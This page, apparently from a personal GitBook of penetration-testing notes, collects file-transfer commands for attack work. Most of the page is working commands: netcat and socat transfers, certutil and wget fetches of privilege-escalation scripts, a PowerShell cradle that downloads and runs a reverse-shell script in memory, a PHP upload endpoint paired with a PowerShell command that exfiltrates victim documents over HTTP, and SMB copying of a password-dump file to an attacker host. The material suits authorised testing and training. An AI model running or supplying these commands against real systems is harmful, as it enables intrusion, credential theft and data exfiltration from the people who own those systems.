Pentest Notes
  • About
  • Notes
    • Methodologies & Tools
      • Scanning & Enumeration
        • Scanning
        • Port 21 - FTP
        • Port 22 - SSH
        • Port 23 - telnet
        • Port 25 - SMTP
          • Enumerate Users via SMTP
        • Port 53 - DNS
        • Port 110 - POP3
        • Port 111 - RPCBind
        • Port 123 - NTP
        • Port 139, 445 - SMB
        • Port 143 - IMAP
        • Port 161 - SNMP
        • Port 389 - LDAP
        • Port 1521 - Oracle DB Listener
        • Port 1433 - MSSQL
        • Port 2049 - NFS
        • Port 3306 - MySQL/MariaDB
        • Port 3389 - RDP
        • Port 5432 - Postgres
        • Port 6379 - Redis
        • Port 27017 - MongoDB
      • Active Directory
        • Housekeeping
        • DNS Recon
        • Finding Users
        • Client Side Attacks
        • PowerShell Domain Enumeration
        • Roasting
        • Mimikatz
        • Credential Attacks
        • Bloodhound
        • Persistence
        • Group Policy Attack Tools
        • Service Account Exploits
        • Delegation
        • Cheatsheets
        • Tool Repos
      • Privilege Escalation
        • Windows
          • Basic Methodology
          • UAC Bypass
          • Privilege Exploits
          • Service Exploits
          • Password Hunting
          • Scheduled Tasks
          • Insecure File Permissions
          • Driver Kernel Exploits
          • LAPS Password
          • AlwaysInstallElevated
          • SMBGhost
          • PowerShell
          • PowerUp
          • Enable Remote Desktop
          • Cheatsheets
        • Linux
          • Shell Upgrade
          • Basic Methodology
          • Adding User to /etc/passwd
          • Add User to /etc/sudoers
          • Docker Breakout
          • LD_Library
          • Checking Weird Binaries
          • Outdated Bash
          • NFS Root Squash
          • Resources
      • Web
        • IDOR
        • LFI - Local File Inclusion
          • Windows LFI List
        • RFI - Remote File Inclusion
        • Command Injection
        • Server Side Template Injection - SSTI
        • SQL Injection
          • Blind Injection Sample Script
        • XSS
        • Authentication
        • Administrative Portals
        • NodeJS
        • 403 Forbidden Bypass
      • Network Pivoting
      • Tools
        • Compiling
        • Cracking
        • Port Knocking
        • Shells
        • SQL
      • File Transfer
      • External
Powered by GitBook
On this page
  • nc
  • socat
  • PowerShell
  • certutil
  • wget
  • scp
  • Windows Exfiltration
  • SMB
  1. Notes
  2. Methodologies & Tools

File Transfer

nc

Receving machine:

nc -nlvp 4444 > incoming.exe

Sending machine:

nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe

socat

Sending:

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

Receving:

nc <remote server's ip address> 80 kali@kali:~$ socat - TCP4:<remote server's ip address>:80
sudo nc -lvp localhost 443 kali@kali:~$ sudo socat TCP4-LISTEN:443 STDOUT

PowerShell

Set-ExecutionPolicy Unrestricted

Download file and save specifically.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

Downloads and runs without saving to disk:

powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')

Basic invocation:

invoke-webrequest -uri http://10.10.14.5/JuicyPotato.exe -outfile jp.exe

certutil

certutil -urlcache -f http://10.10.16.2:8899/winpeas.bat winpeas.bat

wget

wget http://10.50.121.50:8000/LinPEAS.sh -o lp.sh

scp

From Attacker machine.

scp ariah@192.168.130.99:C:/ftp/Infrastructure.pdf .

Password will be required, sshd has to be running on victim (source for file). If necessary, start it:

systemctl start ssh.socket

Windows Exfiltration

If everything is disabled, usually HTTP outbound is still allowed.

Create the upload.php file and save it in /var/www/html on kali:

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

This processes an incoming file request and saves the transferred data to /var/www/uploads.

Next create the uploads folder, grant www-data permissions.

Then invoke the retrieval from the victim.

powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')

Where the IP is the victim machine and important.docx should now be in the kali uploads directory.

SMB

My personal fave, great for windows machines.

smbserver.py <SHARENAME> . --smb2support

Copy to remote machine

copy \\192.168.119.153\\sharez\\nc.exe "C:\\Documents and Settings\\no\\nc.exe"

Copy to kali

copy "C:\Documents and Settings\no\127.0.0.1.pwdump" \\192.168.119.153\\sharez\\127.0.0.1.pwdump
PreviousSQLNextExternal

Last updated 2 years ago